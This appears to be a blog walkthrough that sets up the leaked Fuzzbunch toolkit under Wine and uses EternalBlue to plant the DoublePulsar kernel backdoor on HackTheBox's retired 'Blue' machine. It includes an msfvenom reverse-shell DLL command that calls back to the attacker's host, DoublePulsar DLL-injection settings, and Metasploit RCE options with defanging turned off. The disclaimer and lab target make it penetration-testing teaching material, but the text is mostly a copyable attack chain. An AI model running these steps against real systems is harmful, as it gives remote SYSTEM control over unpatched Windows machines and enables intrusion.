This post is a thinly veiled excuse to get some Fuzzbunch content out there for people who’ve never used the tool, but wanted a thinly veiled excuse and a good target. I’m also posting this because William Vu recently wrote a few fantastic blog posts about the research behind his team’s new Metasploit module for DoublePulsar RCE on both SMB and RDP. Check out William’s Open-Source Command and Control of the DOUBLEPULSAR Implant for relevant reading and get some priceless insight into his approach.
If you’ve found this post but are fuzzy on the backstory Wikipedia has a great entry. TLDR: NSA cyber weapons, ransomware, everyone patched.
Disclaimer: Use Fuzzbunch at your own risk. Never run Fuzzbunch anywhere other than a lab environment, on VMs which you will revert/trash afterwards. Don’t do bad things to people who don’t patch, etc.
We’ll start by installing Wine + Fuzzbunch on an up-to-date Kali VM, then use it to attack HacktheBox’s retired box Blue using the EternalBlue plugin, implant DoulblePulsar, then execute commands via Fuzzbunch and Metasploit’s DoublePulsar RCE module (exploit/windows/smb/smb_doublepulsar_rce). Yes you need a HacktheBox VIP membership to access Blue, yes it’s 100% worth it, and yes you can follow along on an unlicensed copy of Windows 7 x64 that isn’t patched for EternalBlue (MS17–10).
What is DoublePulsar?
DoublePulsar is a Windows backdoor developed by the US government which runs in kernel mode and gives attackers on the local network RCE as SYSTEM. You can test for it using Ping and remotely uninstall it to remove IOC. It’s pretty awesome, and we’re going to infect a computer with it.
These installation steps are 100% taken from mdiazcl’s GitHub. See mdiazcl’s repo for a more thorough breakdown of the process, as I’m going to gloss over and combine steps into big blocks of commands for easy copy/paste into a terminal.
These commands set up Wine and Wine 32, configure the terminal, initialize the Wine environment, and open up a regedit.exe window.
apt update && apt install -qy wine winbind winetricks \
&& dpkg --add-architecture i386 && apt-get update \
&& apt-get install -qy wine32 \
&& WINEPREFIX="$HOME/.wine-fuzzbunch" WINEARCH=win32 wine wineboot \
&& export WINEPREFIX=$HOME/.wine-fuzzbunch \
&& wine regedit.exe
In regedit, go to
HKEY_CURRENT_USER > Environment,
right click > New > String Value. Enter
PATH as the name, then double click on
PATH and set
Value data to:
Click OK, close regedit.exe.
Clone the Fuzzbunch repo, install Python 2.6, and launch the Wine environment. Click
Next on any Python installer popups.
cd $HOME/.wine-fuzzbunch/drive_c \
&& git clone https://github.com/mdiazcl/fuzzbunch-debian.git \
&& winetricks python26 && cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows \
&& wine cmd.exe
Running EternalBlue and Implanting DoublePulsar
Launch Fuzzbunch in the Wine environment created in the previous step:
Most values can be left as default. Here’s what I used for Blue:
- Default Target IP Address: 10.10.10.40
- Default Callback IP Address: <YOUR IP GOES HERE>
- Use Redirection: no
- Base Log directory:<Default>
- Project: 0
- New Project Name: TestingDoublePulsar
- Set target log directory to: <Default>
Next load and configure the EternalBlue plugin with the
Leave all options as Default, except:
- Mode: 1
Hit Enter to execute, your log should look something like this:
Reading through the log, you can see some parts are familiar from Metasploit’s EternalBlue module. You can also see that DoublePulsar was confirmed to have worked via a Ping test.
Verifying the DoublePulsar Implant
use and load the DoublePulsar plugin, to double check the implant worked.
Leave all the values as default except:
- Architecture: 1
- Function: 1
Set the remaining options to Default, then hit Enter to execute the plugin.
Alternatively you can load msfconsole and use the DoublePulsar detection module:
First we’ll use Fuzzbunch’s DLL Injection module with DoublePulsar to get a reverse shell, then we’ll try it again with the cool new Metasploit module.
Use msfvenom to generate a DLL with a basic reverse shell and place it in the root of the Wine environment (
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP GOES HERE> LPORT=443 -f dll -o runme.dll \
&& mv runme.dll ~/.wine-fuzzbunch/drive_c
Back in Fuzzbunch, reload DoublePulsar.
Use the same default values as earlier, except set Functon to 2 for DLL Injection, and specify the path to the payload:
- Function: 2
- DllPayload: C:\runme.dll
Leave the rest as Default, create a netcat listener to catch the reverse shell, and execute the plugin.
Metasploit’s DoublePulsar SMB RCE
Metasploit’s DoublePulsar RCE module is new, so if you’re on an old version of metasploit-framework, update with this one-liner.
curl -sL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb | bash
After updating Metasploit, run msfconsole, then load the module:
Note: if after updating msf the DoublePulsar module is not found, exit msfconsole and reinitialize the database with
Now set options and execute. You must set DefangedMode to False to execute the payload.
set LHOST tun0
set LPORT 443
set RHOSTS 10.10.10.40
set DefangedMode False
Disabling the Implant
The makers of DoublePulsar also included the ability to remove the implant remotely, so lets use it to clean up. From msfconsole, load the DoublePulsar SMB RCE if it’s not already loaded
Set options, don’t forget DefangedMode
set RHOSTS 10.10.10.40
set target 1
set DefangedMode False
Now run it.
Reload Metasploit’s DoublePulsar scanner from earlier and scan Blue. No more backdoor.
That’s how the pros do it. RCE to SYSTEM with a backdoor and fancy interface that anyone could use. Hopefully next time the NSA is more careful about who gets to play with their toys. Until then we’ll have our own toys like Metasploit, and devs like William Vu and his coworkers at Rapid7 adding useful modules to keep Blue Teams busy.